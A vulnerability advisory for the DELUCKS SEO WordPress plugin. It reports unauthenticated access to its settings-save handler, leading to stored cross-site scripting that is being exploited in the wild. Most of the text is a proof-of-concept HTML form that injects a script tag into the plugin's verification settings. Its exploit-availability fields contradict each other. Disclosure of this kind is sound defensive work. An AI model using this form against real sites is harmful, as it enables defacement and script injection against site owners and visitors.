Risk | High |
Patch available | NO |
Number of vulnerabilities | 1 |
CVE-ID | N/A |
CWE-ID | CWE-284 |
Exploitation vector | Network |
Public exploit | This vulnerability is being exploited in the wild. |
Vulnerable software Subscribe |
DELUCKS SEO Web applications / Modules and components for CMS |
Vendor | DELUCKS GmbH |
Security Bulletin
This security bulletin contains one high risk vulnerability.
EUVDB-ID: #VU21333
Risk: High
CVSSv3.1: 7.2 [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N/E:H/RL:U/RC:C]
CVE-ID: N/A
CWE-ID:
CWE-284 - Improper Access Control
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to gain unauthorized access to otherwise restricted functionality.
The vulnerability exists due to improper access restrictions in the "saveSettings()" function when processing data passed to the "/wp-admin/admin-post.php" URL. A remote non-authenticated attacker can bypass implemented security restrictions and execute arbitrary JavaScript code on the website.
Note: this vulnerability is being actively exploited in the wild.
PoC:
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin-post.php" method="POST"> <input type="hidden" name="dpc_save_settings" /> <input type="hidden" name="dpc[basic_metadata][dpc_status_basic_metadata]" value="1" /> <input type="hidden" name="dpc[basic_metadata][en][title][frontpage]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][title][delimiter]" value="-" /> <input type="hidden" name="dpc[basic_metadata][en][title][website]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][desc]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][frontpage]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][delimiter]" value="-" /> <input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][website]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][frontpage]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][delimiter]" value="-" /> <input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][website]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][profiles][title][frontpage]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][profiles][title][delimiter]" value="-" /> <input type="hidden" name="dpc[basic_metadata][en][profiles][title][website]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][archives][title][frontpage]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][archives][title][delimiter]" value="-" /> <input type="hidden" name="dpc[basic_metadata][en][archives][title][website]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][tags][title][frontpage]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][tags][title][delimiter]" value="-" /> <input type="hidden" name="dpc[basic_metadata][en][tags][title][website]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][searchresults][title][frontpage]" value="" /> <input type="hidden" name="dpc[basic_metadata][en][searchresults][title][delimiter]" value="-" /> <input type="hidden" name="dpc[basic_metadata][en][searchresults][title][website]" value="" /> <input type="hidden" name="dpc[basic_metadata][verify][google]" value='"><script>alert("XSS");</script>' /> <input type="hidden" name="dpc[basic_metadata][verify][bing]" value="" /> <input type="hidden" name="dpc[basic_metadata][verify][yandex]" value="" /> <input type="hidden" name="dpc[basic_metadata][verify][baidu]" value="" /> <input type="hidden" name="dpc[basic_metadata][verify][pinterest]" value="" /> <input type="hidden" name="dpc[basic_metadata][verify][alexa]" value="" /> <input type="hidden" name="dpc[basic_metadata][follow_texonomies]" value="follow" /> <input type="hidden" name="dpc[basic_metadata][index_texonomies]" value="index" /> <input type="hidden" name="dpc[basic_metadata][follow_paginated]" value="follow" /> <input type="hidden" name="dpc[basic_metadata][index_paginated]" value="index" /> <input type="hidden" name="dpc[basic_metadata][categories][1][follow]" value="follow" /> <input type="hidden" name="dpc[basic_metadata][categories][1][index]" value="index" /> <input type="hidden" name="dpc[basic_metadata][profiles][follow]" value="follow" /> <input type="hidden" name="dpc[basic_metadata][profiles][index]" value="index" /> <input type="hidden" name="dpc[basic_metadata][attachments][follow]" value="follow" /> <input type="hidden" name="dpc[basic_metadata][attachments][index]" value="index" /> <input type="submit" value="Submit" /> </form> </body> </html>Mitigation
Cybersecurity Help is currently unaware of any official solution to address this vulnerability.
Vulnerable software versionsDELUCKS SEO: 2.0.7 - 2.1.7
External linkshttp://blog.nintechnet.com/vulnerability-in-the-wordpress-delucks-seo-plugin-actively-exploited/
http://www.pluginvulnerabilities.com/2019/09/21/hackers-may-already-be-targeting-this-persistent-xs...
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.
Is there known malware, which exploits this vulnerability?
Yes. This vulnerability is being exploited in the wild.